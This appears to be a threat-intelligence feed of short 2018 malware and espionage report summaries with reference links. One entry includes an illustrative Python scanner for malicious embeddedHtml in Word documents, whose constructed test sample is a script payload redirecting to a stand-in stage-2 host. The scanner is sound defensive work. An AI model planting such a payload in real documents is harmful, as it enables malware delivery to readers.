CenturyLink Threat Research Labs has been tracking the Mylobot botnet, a sophisticated malware family categorized as a downloader. What makes Mylobot dangerous is its ability to download and execute any payload the attacker chooses once it has infected a host, so a compromised machine can be repurposed with new malware at any time. A detailed walkthrough and reverse engineering analysis of Mylobot was first reported in June 2018 by Deep Instinct. While monitoring Mylobot we have observed it delivering the Khalesi information stealer to infected hosts as a second stage; Kaspersky Lab reports that Khalesi is one of the most downloaded malware families of 2018.

REFERENCE:
https://www.netformation.com/our-pov/mylobot-continues-global-infections/
TAG:

Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development. We believe both attacks used the same infrastructure as a reported campaign by the Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope's interest in the U.K. engineering company dates back to attempted intrusions in May 2017.

REFERENCE:
https://go.recordedfuture.com/hubfs/reports/cta-2018-1113.pdf
ADVERSARY:
INDUSTRIES:
TARGETED COUNTRY:

Profiling the Groups Behind the Front Page Credit Card Breaches and the Criminal Underworld that Harbors Them

REFERENCE:
https://cdn.riskiq.com/wp-content/uploads/2018/11/RiskIQ-Flashpoint-Inside-MageCart-Report.pdf
TAG:
INDUSTRY:

Operation Shaheen was an espionage campaign executed over the course of the last year. It was a targeted campaign that appeared to focus on individuals and organizations in Pakistan, specifically the government and the military.

REFERENCE:
https://threatvector.cylance.com/en_us/home/the-white-company-inside-the-operation-shaheen-espionage-campaign.html
GROUP:
ADVERSARY:
INDUSTRIES:
TARGETED COUNTRY:

In late October 2018, security researchers from Cymulate published a proof of concept (PoC) for a logic bug that allows attackers to abuse the online video feature in Microsoft Office to deliver malware. We identified an in-the-wild sample in VirusTotal (detected by Trend Micro as TROJ_EXPLOIT.AOOCAI) that uses this method to deliver the URSNIF information stealer (TSPY_URSNIF.OIBEAO).
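
The following check is added here as an example; it is not code from Trend Micro, Cymulate, or the sample described above. The Cymulate PoC edits the embeddedHtml attribute of the webVideoPr element inside word/document.xml, replacing the YouTube iframe that Office writes for an online video with arbitrary HTML or script. The scanner assumes that location: it unpacks the document (a .docx is a zip), unescapes every embeddedHtml value it finds under word/, and flags values that contain script or whose src points outside a short allow-list of video hosts. The documents it scans are constructed in memory for the demonstration, and the host allow-list and the stage-2 URL are illustrative assumptions, not indicators from the report.

```python
import html
import io
import re
import zipfile
from urllib.parse import urlparse

# Assumed allow-list: hosts Office itself uses for the online video feature.
ALLOWED_VIDEO_HOSTS = {"www.youtube.com", "youtube.com", "www.youtube-nocookie.com"}

# The attribute the Cymulate PoC rewrites; its value is XML-escaped HTML.
EMBEDDED_HTML_RE = re.compile(r'embeddedHtml="([^"]*)"')
SRC_RE = re.compile(r'src\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def inspect_embedded_html(snippet):
    """Return the reasons an unescaped embeddedHtml value looks suspicious."""
    reasons = []
    lowered = snippet.lower()
    if "<script" in lowered or "javascript:" in lowered:
        reasons.append("script content in embeddedHtml")
    for src in SRC_RE.findall(snippet):
        host = (urlparse(src).hostname or "").lower()
        if host not in ALLOWED_VIDEO_HOSTS:
            reasons.append(f"src points outside allowed video hosts: {src}")
    return reasons


def scan_docx(data):
    """Scan the bytes of a .docx; return (part name, reason) findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml = z.read(name).decode("utf-8", errors="replace")
            for raw in EMBEDDED_HTML_RE.findall(xml):
                for reason in inspect_embedded_html(html.unescape(raw)):
                    findings.append((name, reason))
    return findings


def build_docx(embedded_html):
    """Constructed minimal docx-like zip containing only the parts the scanner reads."""
    doc = (
        '<?xml version="1.0"?><w:document><w:body><w:p><w:r><w:drawing>'
        f'<wp15:webVideoPr embeddedHtml="{html.escape(embedded_html, quote=True)}" h="390" w="640"/>'
        "</w:drawing></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed samples: what Office writes for a real online video, and a PoC-style replacement.
BENIGN = ('<iframe width="640" height="390" src="https://www.youtube.com/embed/dQw4w9WgXcQ" '
          'frameborder="0"></iframe>')
MALICIOUS = '<script>document.location="https://example.invalid/stage2"</script>'  # assumed URL


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, scan_docx(build_docx(sample)) or "clean")
```

A real document stores the same attribute, so point scan_docx at the bytes of a suspicious file from mail or a sandbox. The allow-list is deliberately strict: an iframe pointing at any host other than the video service is worth a look even without an obvious script tag, since the PoC only needs Office to render whatever HTML sits in that attribute.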

REFERENCE:
https://blog.trendmicro.com/trendlabs-security-intelligence/hide-and-script-inserted-malicious-urls-within-office-documents-embedded-videos/
TAG:

The Muhstik botnet was first exposed by Netlab360 researchers in May 2018, when it mainly targeted GPON routers. At Intezer we found that Muhstik is extending its range of compromised devices by targeting web servers hosting phpMyAdmin.

REFERENCE:
https://www.intezer.com/muhstik-botnet-reloaded-new-variants-targeting-phpmyadmin-servers/
TAG:
ADVERSARY:

Emotet is a banking Trojan family notorious for its modular architecture, persistence techniques, and worm-like self-propagation. It is distributed through spam campaigns employing a variety of seemingly legitimate guises for their malicious attachments. The Trojan is often used as a downloader or dropper for potentially more-damaging, secondary payloads. Due to its high destructive potential, Emotet was the subject of a US-CERT security notice in July 2018. According to our telemetry, the latest Emotet activity was launched on November 5, 2018, following a period of low activity. Figure 1 shows a spike in the Emotet detection rate in the beginning of November 2018, as seen in our telemetry data.

REFERENCE:
https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. What makes it especially dangerous is that it moves beyond digital damage to endangering human lives. In this post we will review the history of ICS malware, briefly examine how one ICS attack framework operates, and offer our advice on how to fight such threats.

REFERENCE:
https://securingtomorrow.mcafee.com/mcafee-labs/triton-malware-spearheads-latest-generation-of-attacks-on-industrial-systems/
ADVERSARY:
INDUSTRY:
TARGETED COUNTRY:

A targeted attack that used a language-specific word processor shows why it is important to understand and protect against small-scale, localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor for languages such as Urdu, Persian, Pashto, and Arabic. More than 75% of the targets were located in Pakistan, but the attack also reached some countries in Europe and the US. The targets included government institutions.

REFERENCE:
https://cloudblogs.microsoft.com/microsoftsecure/2018/11/08/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets/
TARGETED COUNTRIES:

A hacker group likely supported by North Korea has launched an advanced persistent threat (APT) attack by inserting malicious code in a popular South Korean security program. APT attacks are typically characterized by being sophisticated, long-term attacks aimed at monitoring information and stealing data rather than immediately causing damage to a network or organization.

REFERENCE:
http://blog.alyac.co.kr/m/1963
GROUP: